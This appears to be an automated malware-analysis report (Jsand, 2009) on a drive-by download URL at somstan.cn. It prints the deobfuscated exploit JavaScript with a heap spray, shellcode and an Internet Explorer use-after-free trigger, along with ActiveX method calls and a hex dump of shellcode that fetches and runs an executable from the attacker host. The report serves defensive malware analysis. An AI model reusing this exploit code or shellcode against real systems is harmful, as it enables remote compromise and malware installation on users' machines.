Analysis report for http://somstan.cn/sv/?spl=2&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4
Sample Overview
| URL | http://somstan.cn/sv/?spl=2&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4 |
|---|
| MD5 | 588d5c1a48dc636a4a6c7bd677b86334 |
| Analysis Started | 2009-11-02 19:32:23 |
| Report Generated | 2009-11-02 19:32:29 |
| Jsand version | 1.03.02 |
See the report for domain somstan.cn.
Detection results
| Detector | Result |
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
| Sina Downloader | Sina DLoader is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations | BID-30223 |
Deobfuscation results
Evals
var hhhpllll = fokusp(SLIVVVVVVVVV, gggggggggggoooo);
hhhpllll = unescape(hhhpllll);
var GGHHOOPP = document
(repeated 1 time)
Lomka.replace(/KOHb55544 3233/g, kolma)
(repeated 1 time)
var jedrPvx2X5vfpnL = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6D6F%u7473%u6E61%u632E
%u2F6E%u7673%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u534D%u3930%u302D%u3230");
var OwbS0SanAvKQfiP = new Array();
var VV4vNTqLUNPQ4ED = 0x100000 - (jedrPvx2X5vfpnL.length * 2 + 0x01020);
var HqgWl41cOV1ov44 = unescape("%u0C0C%u0C0C");
while (HqgWl41cOV1ov44.length < VV4vNTqLUNPQ4ED / 2){
HqgWl41cOV1ov44 += HqgWl41cOV1ov44;
}
var YuA1MJTx8dtR4YA = HqgWl41cOV1ov44.substring(0, VV4vNTqLUNPQ4ED / 2);
deleteHqgWl41cOV1ov44;
for (STyITLcwJkaCCel = 0; STyITLcwJkaCCel < 0xC0; STyITLcwJkaCCel ++ ){
OwbS0SanAvKQfiP[STyITLcwJkaCCel] = YuA1MJTx8dtR4YA + jedrPvx2X5vfpnL;
}
CollectGarbage();
var T8b3eN7e1V01J65 = unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var yEXLX2h0y1tZC6E = new Array();
for (var SVmI6xyhpnHhXRm = 0; SVmI6xyhpnHhXRm < 1000; SVmI6xyhpnHhXRm ++ )yEXLX2h0y1tZC6E.
push(document.createElement("img"));
function I3HkbnkYPPVWFTx(){
BSLZV1wbfw8pxRu = document.createElement("tbody");
BSLZV1wbfw8pxRu.click;
var Uo9aAfbspasjA5p = BSLZV1wbfw8pxRu.cloneNode();
BSLZV1wbfw8pxRu.clearAttributes();
BSLZV1wbfw8pxRu = null;
CollectGarbage();
for (var SVmI6xyhpnHhXRm = 0; SVmI6xyhpnHhXRm < yEXLX2h0y1tZC6E.length; SVmI6xyhpnHhXRm
++ )yEXLX2h0y1tZC6E[SVmI6xyhpnHhXRm].src = T8b3eN7e1V01J65;
Uo9aAfbspasjA5p.click;
}
window.setTimeout("I3HkbnkYPPVWFTx();", 200);
function dorefresh(){
window.location = "?spl=3&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4";
}
setTimeout("dorefresh();", 2000);
(repeated 1 time)
Writes
<script>var coolsds = 'erer erdf df dfd ';
var x = unescape(hhhpllll);
eval(x);
</script>
(repeated 1 time)
Network Activity
Requests
| URL | Status | Content Type |
| http://somstan.cn/sv/?spl=2&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4 | 200 | text/html |
| http://somstan.cn/sv/x.x | 200 | text/javascript |
| http://somstan.cn/sv/?spl=3&br=MSIE&vers=7.0&s=ec445bc5411c202a8361c7db463e84b4 | 200 | text/html |
Redirects
No redirects.
ActiveX controls
-
| 97AF4A45-49BE-4485-9F55-91AB40F288F2 |
|
Name | Value | Count |
| Attributes |
OpenWebFile |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| 97AF4A45-49BE-4485-9F55-91AB40F22B92 |
|
Name | Value | Count |
| Attributes |
OpenWebFile |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| 97AF4A45-49BE-4485-9F55-91AB40F22BF2 |
|
Name | Value | Count |
| Attributes |
OpenWebFile |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| 18A295DA-088E-42D1-BE31-5028D7F9B965 |
|
Name | Value | Count |
| Attributes |
OpenWebFile |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| 3356DB7C-58A7-11D4-AA5C-006097314BF8 |
|
Name | Value | Count |
| Attributes |
installAppMgr |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| 7F9B30F1-5129-4F5C-A76C-CE264A6C7D10 |
|
Name | Value | Count |
| Attributes |
PerformUpdateAsync |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| 2BCEAECE-6121-4E78-816C-8CD3121361B0 |
|
Name | Value | Count |
| Attributes |
ExecutePreferredApplication |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
-
| C1B7E532-3ECB-4E9E-BB3A-2951FFE67C61 |
|
Name | Value | Count |
| Attributes |
propHeight |
0 |
1 |
| propWidth |
0 |
1 |
| propDownloadUrl |
http://somstan.cn/sv/load.php?spl=ActiveX_pack |
1 |
| propPostDownloadAction |
run |
1 |
Shellcode and Malware
| Hexadecimal | ASCII |
33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b
58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 44 5a
d1 e2 2b e2 8b ec eb 4f 5a 52 83 ea 56 89 55 04
56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03
f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2
74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e
8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04
8a 03 c3 5f 5e 50 c3 8d 7d 08 57 52 b8 33 ca 8a
5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f b8 65 2e
65 78 ab 66 98 66 ab b0 6c 8a e0 98 50 68 6f 6e
2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 04
93 50 33 c0 50 50 56 8b 55 04 83 c2 7f 83 c2 31
52 50 b8 36 1a 2f 70 ff 55 04 5b 33 ff 57 56 b8
98 fe 8a 0e ff 55 04 57 b8 ef ce e0 60 ff 55 04
68 74 74 70 3a 2f 2f 73 6f 6d 73 74 61 6e 2e 63
6e 2f 73 76 2f 6c 6f 61 64 2e 70 68 70 3f 73 70
6c 3d 4d 53 30 39 2d 30 30 32 | 3.d.@0x..@..p...
X....@4.@|.X<jDZ
..+....OZR..V.U.
VW.s<.t3x..V.v .
.3.IPA.3.6....8.
t......@..X;.u.^
.F$..f..H.V.....
..._^P..}.WR.3..
[.....2.....O.e.
ex.f.f..l...Phon
.dhurlmT..N...U.
.P3.PPV.U......1
RP.6./p.U.[3.WV.
.....U.W....`.U.
http://somstan.c
n/sv/load.php?sp
l=MS09-002 |
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://somstan.cn/sv/load.php?spl=ActiveX_pack |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
2e82f77c8d231b3aa974637b762de216 |
|
| http://somstan.cn/sv/load.php?spl=MS09-002 |
MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit |
2e82f77c8d231b3aa974637b762de216 |
|